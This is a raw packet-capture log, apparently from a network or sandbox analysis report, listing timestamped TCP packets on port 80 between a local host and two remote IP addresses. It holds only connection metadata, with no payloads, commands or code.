                                                                                    Feb 7, 2023 19:44:47.748850107 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:47.748878956 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:47.748895884 CET4969780192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:44:47.748908043 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:47.748934031 CET4969780192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:44:47.748939037 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:47.748969078 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:47.748999119 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:47.749020100 CET4969780192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:44:47.749028921 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:47.749032021 CET4969780192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:44:47.749058962 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:47.749088049 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:47.749104977 CET4969780192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:44:47.749116898 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:47.749145985 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:47.749171019 CET4969780192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:44:47.749175072 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:47.749218941 CET4969780192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:44:47.749224901 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:47.749252081 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:47.749278069 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:47.749305010 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:47.749309063 CET4969780192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:44:47.749332905 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:47.749361038 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:47.749372005 CET4969780192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:44:47.749389887 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:47.749398947 CET4969780192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:44:47.749418020 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:47.749563932 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:47.749622107 CET4969780192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:44:47.749720097 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:47.749810934 CET4969780192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:44:47.749835968 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:47.749862909 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:47.749888897 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:47.749905109 CET4969780192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:44:47.749921083 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:47.749948978 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:47.749960899 CET4969780192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:44:47.749977112 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:47.750005960 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:47.750034094 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:47.750042915 CET4969780192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:44:47.750062943 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:47.750082970 CET4969780192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:44:47.750091076 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:47.750118017 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:47.750127077 CET4969780192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:44:47.750145912 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:47.750202894 CET4969780192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:44:47.750221968 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:47.750251055 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:47.750277042 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:47.750299931 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:47.750303984 CET4969780192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:44:47.750324011 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:47.750345945 CET4969780192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:44:47.750351906 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:47.750381947 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:47.750406981 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:47.750433922 CET4969780192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:44:47.750446081 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:47.750473976 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:47.750475883 CET4969780192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:44:47.750543118 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:47.750571966 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:47.750603914 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:47.750611067 CET4969780192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:44:47.750633001 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:47.750637054 CET4969780192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:44:47.750742912 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:47.750773907 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:47.750782967 CET4969780192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:44:47.750803947 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:47.750814915 CET4969780192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:44:47.750833035 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:47.750859976 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:47.750868082 CET4969780192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:44:47.750890017 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:47.750921011 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:47.750927925 CET4969780192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:44:47.750957966 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:47.750984907 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:47.751022100 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:47.751036882 CET4969780192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:44:47.751085997 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:47.751128912 CET4969780192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:44:47.751158953 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:47.751187086 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:47.751214981 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:47.751241922 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:47.751241922 CET4969780192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:44:47.751250982 CET4969780192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:44:47.751270056 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:47.751296043 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:47.751322985 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:47.751351118 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:47.751360893 CET4969780192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:44:47.751378059 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:47.751382113 CET4969780192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:44:47.751405001 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:47.751432896 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:47.751446962 CET4969780192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:44:47.751470089 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:47.751486063 CET4969780192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:44:47.751502037 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:47.751530886 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:47.751538038 CET4969780192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:44:47.751559019 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:47.751585960 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:47.751609087 CET4969780192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:44:47.751611948 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:47.751641035 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:47.751689911 CET4969780192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:44:47.751694918 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:47.751729012 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:47.751744032 CET4969780192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:44:47.751755953 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:47.751784086 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:47.751810074 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:47.751837015 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:47.751840115 CET4969780192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:44:47.751847982 CET4969780192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:44:47.751872063 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:47.751898050 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:47.751925945 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:47.751950979 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:47.751976013 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:47.751988888 CET4969780192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:44:47.752003908 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:47.752029896 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:47.752047062 CET4969780192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:44:47.752055883 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:47.752073050 CET4969780192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:44:47.752090931 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:47.752118111 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:47.752145052 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:47.752156019 CET4969780192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:44:47.752171993 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:47.752193928 CET4969780192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:44:47.752198935 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:47.752227068 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:47.752270937 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:47.752284050 CET4969780192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:44:47.752306938 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:47.752315044 CET4969780192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:44:47.752336979 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:47.752365112 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:47.752401114 CET4969780192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:44:47.795492887 CET4969780192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:44:47.898890018 CET4969780192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:44:49.252006054 CET4969780192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:44:49.252242088 CET4969780192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:44:49.269409895 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:49.269454956 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:49.340075970 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:49.340120077 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:49.340202093 CET4969780192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:44:49.969584942 CET4969780192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:44:49.969635963 CET4969780192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:44:49.986973047 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:49.987005949 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.050036907 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.050071955 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.050131083 CET4969780192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:44:50.062745094 CET4969780192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:44:50.062794924 CET4969780192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:44:50.080118895 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.080147982 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.145622969 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.145654917 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.145726919 CET4969780192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:44:50.170614004 CET4969780192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:44:50.170711040 CET4969780192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:44:50.188066959 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.188110113 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.309822083 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.309854984 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.309900999 CET4969780192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:44:50.343266010 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.365631104 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.365722895 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.368335962 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.390737057 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.409775972 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.409810066 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.409827948 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.409847975 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.409868002 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.409887075 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.409898043 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.409905910 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.409930944 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.409950972 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.409951925 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.409971952 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.409976006 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.410012960 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.432245016 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.432276011 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.432296038 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.432316065 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.432334900 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.432358980 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.432384014 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.432384968 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.432405949 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.432430029 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.432432890 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.432454109 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.432462931 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.432476997 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.432492018 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.432501078 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.432522058 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.432540894 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.432554960 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.432564974 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.432585001 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.432588100 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.432609081 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.432627916 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.432631969 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.432652950 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.432671070 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.432677031 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.432713985 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.455060959 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.455113888 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.455144882 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.455173016 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.455199957 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.455225945 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.455230951 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.455230951 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.455250025 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.455279112 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.455279112 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.455310106 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.455332041 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.455339909 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.455368996 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.455385923 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.455396891 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.455424070 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.455441952 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.455452919 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.455481052 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.455504894 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.455509901 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.455538034 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.455553055 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.455565929 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.455595016 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.455619097 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.455624104 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.455651999 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.455661058 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.470711946 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.470752001 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.470794916 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.472151995 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.472186089 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.472218037 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.473332882 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.473366976 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.473401070 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.474431038 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.474472046 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.474508047 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.477900982 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.477938890 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.477957964 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.477977991 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.477999926 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.478003979 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.478023052 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.478044987 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.478055000 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.478075981 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.478097916 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.478112936 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.478125095 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.478137970 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.478149891 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.478173971 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.478187084 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.478194952 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.478216887 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.478218079 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.478236914 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.478256941 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.478256941 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.478276968 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.478296995 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.478305101 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.478324890 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.478348970 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.478369951 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.478370905 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.478389978 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.478410006 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.478423119 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.478430986 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.478451967 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.478481054 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.478482008 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.478497982 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.493161917 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.493195057 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.493284941 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.494493961 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.494529009 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.494638920 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.495625973 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.495660067 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.495724916 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.496696949 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.496736050 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.496803045 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.500727892 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.500761986 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.500782013 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.500803947 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.500823975 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.500835896 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.500844002 CET804969877.73.134.27192.168.2.3
